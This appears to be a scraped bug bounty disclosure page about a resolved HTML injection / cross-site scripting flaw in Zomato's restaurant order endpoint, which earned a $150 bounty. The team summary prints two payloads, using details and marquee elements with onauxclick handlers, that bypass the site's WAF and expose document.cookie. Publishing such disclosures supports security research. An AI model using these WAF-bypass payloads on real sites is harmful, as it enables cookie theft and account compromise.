Loading HuntDB...

HTML Injection @ /[restaurant]/order endpoint.

Low
Z
Zomato
Submitted None

Team Summary

Official summary from Zomato

The following payloads were used to bypass the WAF and perform XSS: Basic payload but did not work on all browsers: ```html "><details onauxclick=x=prompt,x`${document.cookie}`></details> ``` Payload worked on all browsers, but needed a right-click to be executed: ```html "><marquee+width=1000+onauxclick=confirm(document.cookie)>XSS</marquee> ```

Reported by mr_edwards

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$150.00

Submitted

Weakness

Cross-site Scripting (XSS) - Generic